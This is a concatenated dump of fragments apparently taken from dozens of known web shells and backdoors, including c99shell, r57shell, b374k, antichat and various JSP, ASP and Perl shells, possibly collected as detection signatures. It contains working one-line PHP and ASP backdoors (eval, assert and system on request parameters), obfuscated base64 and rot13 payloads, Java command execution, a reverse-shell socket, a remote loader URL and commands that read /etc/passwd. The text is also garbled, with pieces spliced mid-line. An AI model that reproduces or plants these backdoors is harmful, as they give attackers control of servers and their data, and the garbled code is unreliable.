f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' - antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? \"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? \"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web 